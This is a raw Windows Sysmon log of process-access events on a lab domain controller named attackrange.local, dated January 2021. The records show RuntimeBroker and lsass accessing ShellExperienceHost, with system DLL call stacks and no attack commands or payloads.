13:30:33.560{08A6967A-4753-6000-0D05-000000009A01}11162916C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\shcore.dll+316d6|C:\Windows\System32\shcore.dll+21cbf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000013009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.560{08A6967A-4753-6000-0D05-000000009A01}11162916C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\shcore.dll+316d6|C:\Windows\System32\shcore.dll+21cbf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000013008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.560{08A6967A-4753-6000-0D05-000000009A01}11166152C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\shcore.dll+316d6|C:\Windows\System32\shcore.dll+21cbf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000013007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.560{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+2a5631|C:\Windows\System32\windows.storage.dll+102e33|C:\Windows\System32\windows.storage.dll+102eaa|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000013006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.560{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+2ccad2|C:\Windows\System32\windows.storage.dll+63255|C:\Windows\System32\windows.storage.dll+102716|C:\Windows\System32\windows.storage.dll+2a5593|C:\Windows\System32\windows.storage.dll+102e33|C:\Windows\System32\windows.storage.dll+102eaa|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86 10341000x800000000000000013005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.545{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+144053|C:\Windows\System32\windows.storage.dll+1437f9|C:\Windows\System32\windows.storage.dll+14370d|C:\Windows\System32\windows.storage.dll+1436a6|C:\Windows\System32\windows.storage.dll+60b6c|C:\Windows\System32\windows.storage.dll+13a466|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86 10341000x800000000000000013004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.545{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+63043|C:\Windows\System32\windows.storage.dll+60e21|C:\Windows\System32\windows.storage.dll+60d7b|C:\Windows\System32\windows.storage.dll+60b0f|C:\Windows\System32\windows.storage.dll+13a466|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000013003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.545{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+6430f|C:\Windows\System32\windows.storage.dll+13a525|C:\Windows\System32\windows.storage.dll+13a448|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000013002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.545{08A6967A-4753-6000-0D05-000000009A01}11165920C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+13a4f9|C:\Windows\System32\windows.storage.dll+13a448|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+14735c 10341000x800000000000000013001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.545{08A6967A-4753-6000-0D05-000000009A01}11162916C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+6411c|C:\Windows\System32\windows.storage.dll+1a23e9|C:\Windows\System32\windows.storage.dll+1a2245|C:\Windows\System32\windows.storage.dll+818c6|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000013000Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.545{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012999Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.545{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012998Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000012997Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000012996Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.545{08A6967A-4753-6000-0D05-000000009A01}11162916C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+8635|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+853f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17343|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012995Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.529{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000012994Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.529{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000012993Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.529{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+8635|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+853f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17343|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012992Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.529{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000012991Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.529{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000012990Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 